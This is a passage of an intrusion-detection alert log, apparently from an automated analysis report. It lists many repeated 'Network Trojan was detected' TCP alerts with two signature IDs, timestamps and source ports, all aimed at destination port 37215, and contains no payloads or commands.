                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808084
                  SID:2829579
                  Source Port:54140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.874571
                  SID:2829579
                  Source Port:58798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.128413
                  SID:2835222
                  Source Port:35968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2829579
                  Source Port:56832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.922167
                  SID:2835222
                  Source Port:51642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.990207
                  SID:2835222
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2829579
                  Source Port:43432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572595
                  SID:2829579
                  Source Port:36690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.114397
                  SID:2829579
                  Source Port:47748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.320673
                  SID:2829579
                  Source Port:46030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.530198
                  SID:2835222
                  Source Port:59646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.122105
                  SID:2829579
                  Source Port:46812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869693
                  SID:2835222
                  Source Port:45760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.204371
                  SID:2835222
                  Source Port:48806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.410615
                  SID:2835222
                  Source Port:59270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.074634
                  SID:2835222
                  Source Port:59546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.555583
                  SID:2829579
                  Source Port:49484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910332
                  SID:2829579
                  Source Port:52228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.865437
                  SID:2835222
                  Source Port:40536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.871657
                  SID:2829579
                  Source Port:56276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.937282
                  SID:2835222
                  Source Port:42466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811319
                  SID:2835222
                  Source Port:47920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.053568
                  SID:2829579
                  Source Port:36152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251804
                  SID:2829579
                  Source Port:60268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510691
                  SID:2835222
                  Source Port:44016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.837566
                  SID:2835222
                  Source Port:35640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.770059
                  SID:2829579
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822486
                  SID:2829579
                  Source Port:40610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.523000
                  SID:2829579
                  Source Port:50306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.661405
                  SID:2835222
                  Source Port:34354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871389
                  SID:2835222
                  Source Port:47192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.032433
                  SID:2829579
                  Source Port:47730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.527707
                  SID:2829579
                  Source Port:58252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2835222
                  Source Port:35428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.431901
                  SID:2829579
                  Source Port:47508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509874
                  SID:2835222
                  Source Port:40900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.050359
                  SID:2829579
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992846
                  SID:2829579
                  Source Port:53470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.967087
                  SID:2835222
                  Source Port:58056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.708629
                  SID:2835222
                  Source Port:55990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.391791
                  SID:2829579
                  Source Port:43450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640605
                  SID:2829579
                  Source Port:43366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245914
                  SID:2835222
                  Source Port:53820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2835222
                  Source Port:34900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659473
                  SID:2829579
                  Source Port:37270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2835222
                  Source Port:40166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.755859
                  SID:2835222
                  Source Port:46144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531536
                  SID:2835222
                  Source Port:60316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102035
                  SID:2829579
                  Source Port:56690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2829579
                  Source Port:53378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622082
                  SID:2835222
                  Source Port:58798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.878182
                  SID:2835222
                  Source Port:40154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.636045
                  SID:2829579
                  Source Port:35444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359612
                  SID:2835222
                  Source Port:38870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.540139
                  SID:2829579
                  Source Port:48694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.994829
                  SID:2835222
                  Source Port:45178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.845766
                  SID:2829579
                  Source Port:42924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.619678
                  SID:2835222
                  Source Port:58724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.109836
                  SID:2835222
                  Source Port:48156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.959053
                  SID:2835222
                  Source Port:39654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.766311
                  SID:2829579
                  Source Port:46334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:33180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.833709
                  SID:2829579
                  Source Port:33144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.437797
                  SID:2835222
                  Source Port:33450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453421
                  SID:2835222
                  Source Port:48692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.671391
                  SID:2835222
                  Source Port:50698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.932047
                  SID:2835222
                  Source Port:41632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322127
                  SID:2835222
                  Source Port:34182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.459051
                  SID:2835222
                  Source Port:44808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851193
                  SID:2829579
                  Source Port:33202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994120
                  SID:2829579
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431557
                  SID:2835222
                  Source Port:43326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.528508
                  SID:2829579
                  Source Port:53148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.982789
                  SID:2835222
                  Source Port:40980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.007894
                  SID:2835222
                  Source Port:46300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.553055
                  SID:2835222
                  Source Port:43916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.571103
                  SID:2835222
                  Source Port:56658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.859810
                  SID:2829579
                  Source Port:59182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.533380
                  SID:2835222
                  Source Port:44396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970396
                  SID:2829579
                  Source Port:49862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.686169
                  SID:2829579
                  Source Port:53822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.648559
                  SID:2829579
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.591326
                  SID:2829579
                  Source Port:46256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.004122
                  SID:2835222
                  Source Port:34952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869693
                  SID:2835222
                  Source Port:39140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.347506
                  SID:2829579
                  Source Port:44412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631188
                  SID:2835222
                  Source Port:54618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2829579
                  Source Port:41978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.480250
                  SID:2829579
                  Source Port:60240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736884
                  SID:2829579
                  Source Port:48288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503966
                  SID:2835222
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2835222
                  Source Port:40310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.114330
                  SID:2829579
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.840921
                  SID:2829579
                  Source Port:49398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.133869
                  SID:2829579
                  Source Port:42818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.252439
                  SID:2829579
                  Source Port:47220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2835222
                  Source Port:46644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.550214
                  SID:2835222
                  Source Port:42380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.126416
                  SID:2835222
                  Source Port:57132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.652052
                  SID:2829579
                  Source Port:44536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.881197
                  SID:2829579
                  Source Port:39102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.212749
                  SID:2829579
                  Source Port:56188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755062
                  SID:2835222
                  Source Port:34566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.111438
                  SID:2829579
                  Source Port:33806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2829579
                  Source Port:45212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437394
                  SID:2835222
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.961226
                  SID:2829579
                  Source Port:57044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284945
                  SID:2829579
                  Source Port:59684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011979
                  SID:2835222
                  Source Port:48922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637493
                  SID:2835222
                  Source Port:48298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.723777
                  SID:2829579
                  Source Port:53352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.777925
                  SID:2835222
                  Source Port:59312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807348
                  SID:2835222
                  Source Port:35784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875328
                  SID:2829579
                  Source Port:33348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350374
                  SID:2829579
                  Source Port:50790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383981
                  SID:2829579
                  Source Port:52780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533467
                  SID:2829579
                  Source Port:39470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.999286
                  SID:2835222
                  Source Port:56426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.395461
                  SID:2835222
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.939147
                  SID:2835222
                  Source Port:47660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.723729
                  SID:2829579
                  Source Port:58956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.134098
                  SID:2835222
                  Source Port:49366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.774897
                  SID:2829579
                  Source Port:40324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.619683
                  SID:2835222
                  Source Port:42898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366312
                  SID:2829579
                  Source Port:44188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.859593
                  SID:2829579
                  Source Port:48400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136124
                  SID:2829579
                  Source Port:34364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.079394
                  SID:2835222
                  Source Port:50408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.325591
                  SID:2829579
                  Source Port:48226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177713
                  SID:2835222
                  Source Port:44432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.477430
                  SID:2835222
                  Source Port:57902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.883243
                  SID:2835222
                  Source Port:59736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152131
                  SID:2835222
                  Source Port:38452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.813021
                  SID:2835222
                  Source Port:45526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840826
                  SID:2835222
                  Source Port:47032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986594
                  SID:2829579
                  Source Port:38092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.422922
                  SID:2829579
                  Source Port:35012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036040
                  SID:2835222
                  Source Port:47266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.537830
                  SID:2829579
                  Source Port:43242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.008674
                  SID:2829579
                  Source Port:52572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.619310
                  SID:2829579
                  Source Port:47074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.828157
                  SID:2829579
                  Source Port:59576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849175
                  SID:2835222
                  Source Port:38728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.849744
                  SID:2835222
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.327506
                  SID:2829579
                  Source Port:51222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.027883
                  SID:2835222
                  Source Port:40626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.483664
                  SID:2829579
                  Source Port:48902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2829579
                  Source Port:34986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881228
                  SID:2829579
                  Source Port:51042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281764
                  SID:2835222
                  Source Port:47210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.622039
                  SID:2829579
                  Source Port:36914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.022260
                  SID:2835222
                  Source Port:36332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.624791
                  SID:2835222
                  Source Port:52670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.551602
                  SID:2835222
                  Source Port:48302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.882743
                  SID:2835222
                  Source Port:41920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.657783
                  SID:2835222
                  Source Port:42534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.337893
                  SID:2829579
                  Source Port:55258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.475400
                  SID:2829579
                  Source Port:49394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.913856
                  SID:2835222
                  Source Port:37838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.967608
                  SID:2835222
                  Source Port:33126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.143169
                  SID:2829579
                  Source Port:59506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.521266
                  SID:2829579
                  Source Port:37688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.168709
                  SID:2829579
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.484903
                  SID:2835222
                  Source Port:47274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829677
                  SID:2835222
                  Source Port:35360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.784198
                  SID:2835222
                  Source Port:56168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944748
                  SID:2829579
                  Source Port:58050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.099101
                  SID:2835222
                  Source Port:52836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.427217
                  SID:2829579
                  Source Port:57658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.660346
                  SID:2835222
                  Source Port:48426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.622181
                  SID:2829579
                  Source Port:58578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994120
                  SID:2835222
                  Source Port:47714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.440682
                  SID:2829579
                  Source Port:53470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342046
                  SID:2835222
                  Source Port:35680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.862669
                  SID:2835222
                  Source Port:54538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161476
                  SID:2829579
                  Source Port:33102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423128
                  SID:2835222
                  Source Port:47098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2829579
                  Source Port:55086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.332212
                  SID:2835222
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.753614
                  SID:2835222
                  Source Port:34910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807488
                  SID:2829579
                  Source Port:44978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.199657
                  SID:2829579
                  Source Port:45396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650835
                  SID:2835222
                  Source Port:60858
